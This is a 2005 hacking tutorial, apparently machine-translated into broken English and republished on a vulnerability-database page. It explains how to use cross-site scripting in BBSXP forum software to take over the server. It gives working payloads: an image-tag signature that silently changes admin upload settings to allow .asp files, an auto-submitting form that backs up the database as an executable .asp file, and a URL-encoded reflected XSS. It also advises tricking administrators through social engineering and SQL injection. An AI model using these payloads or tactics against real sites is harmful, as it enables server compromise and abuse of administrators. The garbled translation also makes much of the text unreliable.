Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220055364
HistoryDec 13, 2005 - 12:00 a.m.

The latest hacking techniques: the XSS cross-site scripting attack detailed description-vulnerability warning-the black bar safety net

2005-12-1300:00:00
佚名
www.myhack58.com
10
JSON

General description
A simple description of what isXSSattack
How to findXSSvulnerability
ForXSSattack the General idea
From internal attacks:
How to find the internalXSSvulnerability
How to construct attack
How to use
The junction of any instances of attacks, such as DVBBS&BBSXP
From external attack
How to constructXSSattack
How to deceive the administrator open
XSSwith other technologies of knot what
With mssql injection of the combination
QQ cross-site junction where
Domestic large-scale statistics web site the cross-site vulnerabilities
Social engineering
Making a horror flash Trojan
The production method by Li Feng beginning to write
Summary

Body:
XSSGeneral description
What isXSSattack
XSSalso known as CSS (Cross Site Script), cross-site scripting attacks. It refers to a malicious attacker to the Web page to insert malicious html code, when a user browses the page, Embedded Web inside the html code will be executed, so as to achieve a malicious user of the special purpose. XSSbelongs to the passive attacks, because of its passive and not use, so many people often call slightly its harmful. While this article is primarily about the use ofXSSto give the target server shell. Technology although is old technology, but its ideas hope to help everyone.
How to findXSSvulnerability
Personally, I putXSSthe attack is divided into two categories, one is from internal attacks, mainly refers to the use of the program’s own vulnerability, to construct cross-site statement, such as:dvbbs of showerror. asp the presence of cross-site vulnerabilities. The other is from external attacks, mainly referring to construct their ownXSScross-site vulnerabilities a web page or looking for non-target machine other than a cross-site vulnerability of the page. Such as when we want to infiltrate a site, we ourselves constructed a cross-site vulnerability of the page, and then construct cross-site statement, through a combination of other techniques, such as social engineering, etc., to deceive the target server administrator to open.
And then use the following technique to get a shell.
How to use
Traditional cross-site the use of methods are generally attacker to construct a cross-site page, and then in another space to put a collection of cookie page, and then in combination with other techniques let the user open to cross-site pages to steal user’s cookie, in order to further attack. Personally think this is way too behind, for the drawbacks you may all know, because even if you collected the cookie you may not be able to penetrate further into it, most of the cookies inside the password is encrypted, if you want the cookie trick, then, is also subject to other conditions of the Limited is about. And this paper presents another idea, from a certain extent, solve the above problems. For individuals, more Mature approach is through cross-site constructs a form, the form content is to use the program’s backup function or admin function to give a high privilege. Below I will detail this technique.
From the interior of the cross-site attacks
Looking for cross site vulnerabilities
If there are Code words the better do, we mainly look at the code in the user input place and the variable has nothing to do with the length and the”<”,”>”,”;”,”’”and other characters are filtered. Also to be noted that the tag is closed, like test QQ group cross-site vulnerability when your in the title at the input<script>alert(‘test’)</script>, the code will not be executed, because in the source code, there are other tags not closed, as little a</script>, this time, you just closed a</script>, the code will be executed, such as: your title at the input</script><script>alert(‘test’)</script>, so you can pop a test frame.
How to use
I’m the first to BBSXP, for example, the process has been made into animation, the details, the visible disc of the animation. I, for BBSXP, two of which compare well with the cross-site vulnerability points, for example.
a. To register an ordinary user, I registered here the user is linzi. Then we at personal signature write:

!

c. Then send a post, can be combined with other techniques to deceive the administrator to browse the hair patch.
d. Because it is a test, so we as an administrator login, and then open the patch, we will find that linzi has become a community warden station, as shown in Figure a
In addition, we as long as the personal signature of the input
! [](http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=1 2&Reg10=1 0&style=1&selectup=FSO&MaxFace=1 0 2 4 0&MaxPhoto=3 0 7 2 0&MaxFile=1 0 2 4 0 0&UpFileGenre=gif|jpg|asp%2 0|rar)

Similarly, a post, etc., as long as the administrator opens, it will add a extension asp (space)to upload the extension, this time, you just upload one of the newmm. asp (space)you can get a shell.
The above attack more or less little limitations, although you can get a shell, but the concealment is not very good, because the signature
By the length limit, cannot be exceeded 2 5 5 characters. We can combine flash across the station to achieve a more covert
Attack for flash Trojan production, the following see bro abundance at the beginning of the introduction.
Reuse is as follows:
Modify the look of your profile picture url,enter the code as follows: admin_setup. asp? menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=1 2&Reg10=1 0&style=1&selectup=FSO&MaxFace=1 0 2 4 0&MaxPhoto=3 0 7 2 0&MaxFile=1 0 2 4 0 0&UpFileGenre=gif|jpg|php|rar

Then again deceive the administrator opens your information or browsing your Postings, when the administrator opens, it will automatically in the background to add a php extension of the drop out, because bbsxp in the personal avatar url in the filtered spaces,%, so we can only add a not include spaces other extensions, of course, you can also add a shtml extension, and with it you will be able to view the source code, and then further attack.
Third, from the outside of the cross-site attacks
Sometimes, when we for the target program can not find the use of cross-site, this time we can use the CAN from the outside to start with, the use we’re gonna take Is it a theory about, theory about the security of Doing good, but its a message Board but there is cross-site vulnerability, this time we can in the message Board write cross-site statement, cross-site statement as to the form of the way to the squawk submitted to the elevated privileges of the statement, as in the above bbsxp add the asp extension to the statement. Of course we can use background backup function directly to get a shell.
例 : 先 上传 一 个 文件 linzi.txt, the content is as follows:
<body ><form
action=“http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf” method=“post”><input value=“database/bbsxp. mdb” name=“yl” ><input value=“database/shit. asp” name=“bf” ></body></html>

The above code is to put the theory to talk about the database backup is shit. asp, message Board memoryIn the cross-site as follows:
http://127.0.0.1/bbsxp/page2.asp?username=
We configured the backup cross-site statement is as follows:
http://127.0.0.1/bbsxp/page2.asp?username=<body onload%3D"javascript%3Adocument.forms[0].submit()"><form action%3D"http%3A%2F%2F127.0.0.1%2Fbbsxp%2Fadmin_fso.asp%3Fmenu%3Dbakbf" method%3D"post"><input value%3D"database%2Fbbsxp.mdb" name%3D"yl" ><input value%3D"database%2Fshit.asp" name%3D"bf" ><%2Fbody><%2Fhtml>

Or to construct cross-site statement, 利用iframe打开一个0大小的linzi.txt the.
When the administrator opens, it will automatically backup to get a shell.
Fourth, XSSwith other technologies of knot what
From the above examples, we can know, how to cheat management open is a very important step, for cheat open, in addition to social engineering, we can combine other technologies, such as sql injection. When we penetrate a website, the Main Station mssql injection vulnerability, access for the public,this time we use the update construct cross-site statement, such as with an iframe open a above backup get the shell cross-site statement, etc., similarly, we can in social engineering, the use of QQ and other cross-site vulnerability, etc.
Always for cheating is also an art, specifically how to use, you just play your own imagination!
Five, the Flash Trojan production.
Slightly

JSON